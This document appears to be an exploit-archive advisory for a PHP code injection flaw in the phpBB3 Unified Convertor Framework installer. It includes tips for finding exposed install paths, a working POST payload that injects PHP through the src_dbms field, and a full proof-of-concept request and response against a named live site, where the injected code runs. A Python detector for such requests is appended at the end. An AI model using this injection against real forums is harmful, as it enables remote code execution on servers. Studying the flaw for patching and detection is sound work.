#Title: phpBB3 Unified Convertor Framework PHP Code Injection
#Date: 12.12.13
#Contact: [email protected]
---------------------------------------------------------------
The phpBB3 Unified Convertor Framework suffers from a PHP code injection
in the installation path. By default it should be disabled, but you can
find open installation paths by dorking or by looking for the directories.
Example:
path/index.php?language=pl&mode=convert&sub=settings&tag=phpbb20
www.phpbb-forum.com/install/index.php?language=pl&mode=convert&sub=settings&tag=phpbb20
POST Data:
forum_path=../forums&refresh=1&src_dbhost=mysql.phpbb-forum.com&src_dbms=[PHP Injection]&src_dbname=db_name&
src_dbpasswd=random&src_dbport=3306&src_dbuser=random&src_table_prefix_phpbb_&submit=Start
---------------------------------------------------------------
PoC:
Request:
POST /2/index.php?language=pl&mode=convert&sub=settings&tag=phpbb20 HTTP/1.1
Host: www.black-hawk.pl
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: phpbb3_mhrwf_u=1; phpbb3_mhrwf_k=; phpbb3_mhrwf_sid=55ca2a95fa6df59c4e401181be06f96f; __utma=25232750.891580291.1386842589.1386842589.1386842589.1; __utmb=25232750; __utmc=25232750; __utmz=25232750.1386842589.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); style_cookie=null; BE=7e4c6af4bfbb176d43a3e0b3150e66d8e9f8308cba84c1f736838085d05766cb3e943a96552aef7756f57c115fd640f99f54cd581ff1b4ab83b32f8773484f88538108245
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 223

forum_path=..%2fforums&refresh=1&src_dbhost=mysql.cba.pl&src_dbms=${@print(666)}\&src_dbname=black_hawk_pl&src_dbpasswd=random&src_dbport=3306&src_dbuser=black_hawk&src_table_prefix_phpbb_&submit=Rozpocznij%20konwersj%c4%99
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 Dec 2013 10:48:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.17
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Content-Length: 8741

<br />
<b>Warning</b>: Unexpected character in input: ''' (ASCII=39) state=1 in <b>/virtual/black-hawk.pl/2/index.php(752) : eval()'d code</b> on line <b>1</b><br />
<br />
<b>Warning</b>: Unexpected character in input: '\' (ASCII=92) state=1 in <b>/virtual/black-hawk.pl/2/index.php(752) : eval()'d code</b> on line <b>1</b><br />
<br />
<b>Warning</b>: Unexpected character in input: ''' (ASCII=39) state=1 in <b>/virtual/black-hawk.pl/2/index.php(752) : eval()'d code</b> on line <b>1</b><br />
666<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="pl" xml:lang="pl">
<head>
(...)
...as you can see it works - 666 got printed.
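A defensive check for the request pattern shown above, added here as an example and not part of the original advisory: it scans logged requests for the convertor endpoint (mode=convert) and flags src_* values that are not plain database settings. The function name, the allowed src_dbms pattern and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate src_dbms value is a short driver name such as "mysql".
SAFE_DBMS = re.compile(r"[a-z0-9_]{1,32}")
# PHP variable-interpolation openers, which have no place in database settings.
INTERPOLATION = re.compile(r"\$\{|\{\$")


def inspect_request(method, target, body):
    """Return a list of findings for one logged HTTP request."""
    url = urlsplit(target)
    query = parse_qs(url.query)
    if not url.path.endswith("/index.php") or query.get("mode") != ["convert"]:
        return []  # not the convertor installer endpoint
    findings = ["request to convertor installer: " + url.path]
    if method != "POST":
        return findings
    fields = parse_qs(body, keep_blank_values=True)
    for name, values in sorted(fields.items()):
        if not name.startswith("src_"):
            continue
        for value in values:
            if name == "src_dbms" and not SAFE_DBMS.fullmatch(value):
                findings.append("src_dbms is not a plain driver name: %r" % value)
            elif INTERPOLATION.search(value):
                findings.append("%s contains PHP interpolation syntax: %r" % (name, value))
    return findings


# Constructed samples: the first body mirrors the request shown above (host-specific
# values replaced), the second is an ordinary conversion request.
SAMPLES = [
    ("POST", "/install/index.php?language=pl&mode=convert&sub=settings&tag=phpbb20",
     "forum_path=..%2fforums&refresh=1&src_dbhost=db.example&src_dbms=${@print(666)}\\"
     "&src_dbname=forum&src_dbuser=forum&src_dbport=3306&submit=Start"),
    ("POST", "/install/index.php?language=pl&mode=convert&sub=settings&tag=phpbb20",
     "forum_path=..%2fforums&refresh=1&src_dbhost=db.example&src_dbms=mysql"
     "&src_dbname=forum&src_dbuser=forum&src_dbport=3306&submit=Start"),
]

if __name__ == "__main__":
    for method, target, body in SAMPLES:
        for finding in inspect_request(method, target, body):
            print(method, target.split("?")[0], "->", finding)
```

Any hit on the installer path is worth reviewing on its own, since the advisory notes the convertor should be disabled by default.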
# 0day.today [2018-01-02] #